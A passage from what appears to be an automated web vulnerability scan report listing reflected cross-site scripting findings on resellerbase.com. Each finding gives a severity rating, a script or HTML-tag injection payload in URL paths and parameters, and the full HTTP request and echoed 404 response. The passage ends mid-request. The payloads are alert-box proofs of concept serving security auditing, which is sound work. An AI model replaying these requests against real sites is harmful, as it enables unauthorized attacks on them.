Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesb9829<script>alert(1)</script>1d930b4b6bb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5097. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1041<script>alert(1)</script>999f6d2a307 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/search.phpf1041<script>alert(1)</script>999f6d2a307?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.phpf1041<script>alert(1)</script>999f6d2a307?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5098. http://www.resellerbase.com/web-service/domain-names/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload c77ae<a>a4e40f29a49 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Searchc77ae<a>a4e40f29a49&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Searchc77ae<a>a4e40f29a49&opt=2 was not found on this server.</p>
...[SNIP]...

2.5099. http://www.resellerbase.com/web-service/domain-names/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 3877f<a>146dff65a7f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...3877f<a>146dff65a7f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...3877f<a>146dff65a7f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5100. http://www.resellerbase.com/web-service/domain-names/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62562<script>alert(1)</script>5329d723f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2&62562<script>alert(1)</script>5329d723f9c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2&62562<script>alert(1)</script>5329d723f9c=1 was not found on this server.</p>
...[SNIP]...

2.5101. http://www.resellerbase.com/web-service/domain-names/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5e434<a>41220101433 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=25e434<a>41220101433 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=25e434<a>41220101433 was not found on this server.</p>
...[SNIP]...

2.5102. http://www.resellerbase.com/web-service/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload acff1<script>alert(1)</script>38ea1355f3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceacff1<script>alert(1)</script>38ea1355f3c/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceacff1<script>alert(1)</script>38ea1355f3c/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5103. http://www.resellerbase.com/web-service/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c51f<script>alert(1)</script>1b7d7695c41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/googlepr.php1c51f<script>alert(1)</script>1b7d7695c41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/googlepr.php1c51f<script>alert(1)</script>1b7d7695c41 was not found on this server.</p>
...[SNIP]...

2.5104. http://www.resellerbase.com/web-service/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 57c1c<a>620fe4ba2c8 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/googlepr.php?link_id=757c1c<a>620fe4ba2c8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/googlepr.php?link_id=757c1c<a>620fe4ba2c8 was not found on this server.</p>
...[SNIP]...

2.5105. http://www.resellerbase.com/web-service/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3dd4d<script>alert(1)</script>e642e9a5827 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/googlepr.php?3dd4d<script>alert(1)</script>e642e9a5827=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/googlepr.php?3dd4d<script>alert(1)</script>e642e9a5827=1 was not found on this server.</p>
...[SNIP]...

2.5106. http://www.resellerbase.com/web-service/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 363ec<script>alert(1)</script>db5623a2a72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service363ec<script>alert(1)</script>db5623a2a72/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service363ec<script>alert(1)</script>db5623a2a72/more2.html was not found on this server.</p>
...[SNIP]...

2.5107. http://www.resellerbase.com/web-service/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9740f<script>alert(1)</script>5192287fd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/9740f<script>alert(1)</script>5192287fd0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/9740f<script>alert(1)</script>5192287fd0 was not found on this server.</p>
...[SNIP]...

2.5108. http://www.resellerbase.com/web-service/other/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54406<script>alert(1)</script>0f43fd0f75d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service54406<script>alert(1)</script>0f43fd0f75d/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service54406<script>alert(1)</script>0f43fd0f75d/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.5109. http://www.resellerbase.com/web-service/other/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e03a5<script>alert(1)</script>43f11b2da0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/othere03a5<script>alert(1)</script>43f11b2da0a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/othere03a5<script>alert(1)</script>43f11b2da0a/ was not found on this server.</p>
...[SNIP]...

2.5110. http://www.resellerbase.com/web-service/other/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53007<script>alert(1)</script>919fc1c96dd570a93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/other53007<script>alert(1)</script>919fc1c96dd570a93/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other53007<script>alert(1)</script>919fc1c96dd570a93/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.5111. http://www.resellerbase.com/web-service/other/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 13ade<script>alert(1)</script>cb81be513ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/?13ade<script>alert(1)</script>cb81be513ea=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/?13ade<script>alert(1)</script>cb81be513ea=1 was not found on this server.</p>
...[SNIP]...

2.5112. http://www.resellerbase.com/web-service/other/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/other/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 42a81<a>a61c54a0b66 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f42a81<a>a61c54a0b66 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f42a81<a>a61c54a0b66 was not found on this server.</p>
...[SNIP]...

2.5113. http://www.resellerbase.com/web-service/other/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f8d4<script>alert(1)</script>aa186feca8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service1f8d4<script>alert(1)</script>aa186feca8d/other/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service1f8d4<script>alert(1)</script>aa186feca8d/other/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5114. http://www.resellerbase.com/web-service/other/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae62a<script>alert(1)</script>b6c6890eedc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherae62a<script>alert(1)</script>b6c6890eedc/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherae62a<script>alert(1)</script>b6c6890eedc/googlepr.php was not found on this server.</p>
...[SNIP]...

2.5115. http://www.resellerbase.com/web-service/other/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd48c<script>alert(1)</script>f491b86b74d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/googlepr.phpdd48c<script>alert(1)</script>f491b86b74d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
